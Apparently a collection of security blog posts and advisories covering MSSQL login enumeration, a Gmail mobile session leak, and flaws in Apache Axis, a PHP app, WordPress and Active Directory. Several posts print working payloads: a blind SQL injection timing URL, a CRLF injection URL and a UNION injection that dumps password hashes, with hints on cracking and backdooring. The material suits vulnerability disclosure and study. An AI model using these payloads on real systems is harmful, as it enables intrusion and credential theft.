Enumeration:

exec sp_who 'validuser';

returns no records(as you don't have privileges to see information about other users) but no errors too..:)
-------------------------
exex sp_who 'invaliduser';
returns error:
Msg 15007, Level 16, State 1, Procedure sp_who, Line 59
'invaliduser' is not a valid login or you do not have permission.
————————

Hence, you can enumerate usernames. You can also enumerate Windows users (if mixed mode authentication is enabled) like this:

exec sp_who ‘test-system\Administrator’

and also possibly the domain users, depending upon which domain users are allowed to connect(typically domain admins).

You need to know the valid machine_name/domain_name for this to work. But that’s not a problem as this can be obtained from the following:

1. IIS NTLM authentication, which discloses machine name and domain name(use hoppy).
2. This can also be obtained from terminal services dialog box.
3. This stored procedure(sp_who) itself returns the hostname.
4. There are other several ways to obtain this.

After you have enumerated users, you know what to do next. Try cracking passwords through other services e.g. RDP, SMB etc.

Through SQL Injections use this poc to enumerate logins(assuming a blind sql injection):-

http://127.0.0.1/upload/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEM\blah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'--

When the username is right, it will wait for 20 seconds.

burp logs showing http request

1. A few weeks ago, google introduced a new feature in GMAIL, through which you can force the gmail session to not use HTTP at all, and only talk over HTTPS. This unfortunately does not apply to google mobile(http://mobile.google.com/) and even though you set your preferences to only use HTTPS, gmail accessed via mobile devices still make requests over HTTP. The HTTP request takes place in the background. The clear text response contains all the session cookies and also a URL over HTTPS.

2. Further to make matter worse, this URL returned over port 80, contains session-id in URL and is sufficient to access email(attacker does not need your session cookie). Thus, if your mobile device is going through a proxy server, and an attacker manages to access the logs of this proxy server, he will have access to this URL containing session id, and thus its slightly more concerning. Of course, once you log out, this URL will be no longer valid and hence the attack has a time limitation.

Update: Google has fixed the second issue and don’t appear to be too keen to fix the first one.

Tested in version:- Oracle 10g Express edition 10.2.0.1.0, other versions may also be vulnerable.

Patch:- Oracle CPU April 2008

vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4  do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF injection and although, it html encodes all the user's input, thereby denying any XSS or html injection, content injection is still be possible(a minor issue).

Exploit:-http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d

%0a———————%0d%0aAn%20Error%20has%20Occured

%0d%0a%0d%0aplease%20send%20your%20

credentials%20and%20problem%20encountered%20to%20%0d

%0ablah@blah.com%0d%0a————–%0d%0a%0d%0a%0d

%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault – ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

———————

 An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

————–

.jws

 AxisFault

…

..
 

The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.

The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using john-the-ripper.

Exploit:-

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

works against postgres database .

Refer to the paper for exploiting sql injections against postgres database. 

example:-http://192.168.1.183:80/apache2-default/wordpress/?feed=rss2

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2007-01-08 04:12:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT 0, 10'

As the injection point is after Limit and because of the Order By clause, i think it is not exploitable.
If you think it is indeed exploitable drop me an email now...

Issue:- Microsoft Windows Active Directory Username Enumeration

Criticality:- Less Critical

Impact:- Exposure of system information

Description:- It has been identified that the Microsoft windows Active
Directory contains a flaw that may lead to an unauthorized information
disclosure. The issue is triggered when the Windows Domain Controller
returns different error messages depending on if a valid username was
supplied via windows terminal services. This only happens for the
user accounts that have time restrictions set and when these accounts
are accessed during restricted time. This can be exploited to help
enumerate valid usernames resulting in a loss of confidentiality.

Vendors response:-
“We will NOT be issuing a security update for this issue.
It is likely that in a next version or service pack of the product we may consider making changes, but not before then”.

Screenshots:
1. Error returned When Account is Accessed at Restricted time
2. Error returned When Account is Accessed at Permitted time

Affected Versions: These issues were reported in version 2.1.2,(current stable version) and its very likely that previous versions may also be vulnerable.

1. Privilidge Escalation:

Under normal circumstances (through web interface) a user in contributor role only has access to following functions:

a. read
b. edit_posts

functionality ‘publish_posts’ is restricted to users in the author, editor or administrator roles. However, this is not implemented in xmlrpc.php and this allows a user in the contributor roles to publish a previously saved post to the website.

No exploit code is required.

2. SQL Injection:

This is only exploitable by authenticated users.
The post_id parameter is not properly sanitized before passing its value to the backend database which results in a Sql injection. Exploiting this is pretty trivial. As, it is an integer based injection, it works irrespective of the setting “magic quote”. . I wrote a Simple Proof Of Concept for this.
Download Exploit
—————————————————–

—————————————————–

Successful Exploitation of this will give you usernames and md5 hash of password of all users including admin user. Before you run mdcrack on this hash, read my previous post on wordpress cookies as this will save your time.
Once you have the admin user hash needless to say you can create a php backdoor and that essentialy is game over.

About Poc:
The poc demonstrates how critical SQL injection vulnerabilities can be. In this example,the poc goes beyond obtaining admin hashes. It also returns the username and encrypted password of the mysql user(s). If the database is running as privilidged user, this will also try to fetch the /etc/passwd file, or any other file for that matter. As this injection is in an integer field it works irrespective of the setting magic quote

Workaround:
1. Disable xmlrpc if you dont use it or restrict its access to trusted users only.

Vendor’s response:
1. vendor notified on 22nd March 2007.
2. New Version released on 2nd April 2007.
3. Advisory released on 2nd April 2007